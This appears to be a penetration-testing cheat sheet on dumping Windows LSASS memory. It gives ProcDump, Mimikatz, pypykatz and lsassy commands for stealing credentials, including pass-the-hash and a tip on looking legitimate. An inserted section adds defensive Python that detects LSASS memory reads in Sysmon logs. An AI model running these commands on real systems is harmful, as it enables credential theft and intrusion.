LSASS secrets

How to find sensitive data in the LSASS.

Overview

In Windows, the Local Security Authority Subsystem Service (LSASS) enforces the security policy on the system. The LSASS service is involved in tasks such as handling logons and password changes, which means that credentials and password hashes are held in the memory of the LSASS process. With administrative rights, those credentials and hashes can be extracted from that memory.

Local Dumping

Locally Dumping LSASS

ProcDump is a Windows tool from the Sysinternals package and can be used to dump the process memory of LSASS. Because it is a signed Microsoft tool, this may be a more legitimate-looking method of dumping LSASS than bringing unsigned attack tools onto the host.

The following command will dump the LSASS memory to a .dmp file:

procdump.exe -accepteula -ma lsass.exe lsass.dmp
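The defender's counterpart to the command above, added here and not part of the original cheat sheet: a dump of lsass.exe requires opening the process with at least PROCESS_VM_READ, which Sysmon records as Event ID 10 (ProcessAccess) with SourceImage, TargetImage and GrantedAccess fields. The records below are constructed samples in that field shape (not real host logs), the pipe-separated layout and the allowlist of system images are assumptions, and the allowlist must be tuned per environment.

```python
# Process access rights from winnt.h; a memory dump needs at least PROCESS_VM_READ.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Constructed sample records in the shape of Sysmon Event ID 10 fields (not real logs).
SAMPLE_EVENTS = [
    "SourceImage=C:\\Windows\\System32\\svchost.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1000",
    "SourceImage=C:\\Users\\jdoe\\Downloads\\procdump.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1FFFFF",
    "SourceImage=C:\\Windows\\System32\\taskmgr.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1410",
    "SourceImage=C:\\Windows\\System32\\csrss.exe|TargetImage=C:\\Windows\\System32\\notepad.exe|GrantedAccess=0x1FFFFF",
]

# Assumed baseline of images that routinely open lsass.exe on a host; taskmgr.exe is
# deliberately left out because its "Create dump file" action also writes LSASS memory.
ALLOWLIST = {
    "c:\\windows\\system32\\svchost.exe",
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
}


def parse_event(line):
    """Split one 'Key=Value|Key=Value' record into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def is_lsass_read(event):
    """True when a non-allowlisted process opened lsass.exe with memory-read rights."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    # 0x1000 (QUERY_LIMITED_INFORMATION) alone cannot read memory, so it is not flagged;
    # 0x1FFFFF (PROCESS_ALL_ACCESS) and 0x1410 both include PROCESS_VM_READ.
    return bool(granted & PROCESS_VM_READ)


def find_lsass_reads(lines):
    """Return the SourceImage of every record that looks like an LSASS memory read."""
    return [parse_event(l)["SourceImage"] for l in lines if is_lsass_read(parse_event(l))]


if __name__ == "__main__":
    for image in find_lsass_reads(SAMPLE_EVENTS):
        print("possible LSASS dump by", image)
```

Pairing this with a rule on Sysmon Event ID 11 (FileCreate) for a new .dmp file from the same process tightens the signal, since ProcDump both reads LSASS and writes the dump.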

Credential Extraction

Once the lsass.dmp file has been obtained and transferred to an attack machine, Mimikatz or pypykatz can be used to extract the data offline.

After opening mimikatz on the attack machine, the following commands should be used:

sekurlsa::minidump "lsass.dmp"

sekurlsa::logonpasswords

After opening pypykatz on the attack machine, the following command should be used:

pypykatz lsa minidump lsass.dmp

Remotely Dumping (With Credentials)

LSASS can be dumped remotely using lsassy, given local administrator credentials. lsassy is a project which ties together two other well-known tools, impacket and pypykatz, to retrieve the data stored in LSASS.

Dump LSASS credentials with plaintext credentials

lsassy -d <domain> -u <user> -p <password> <target>

Dump LSASS credentials with pass-the-hash (NTLM)

lsassy -u <user> -H <NThash> <target>

Dump LSASS credentials with pass-the-ticket (Kerberos)

  • Requires an environment variable to be set, see here

lsassy -k <target>
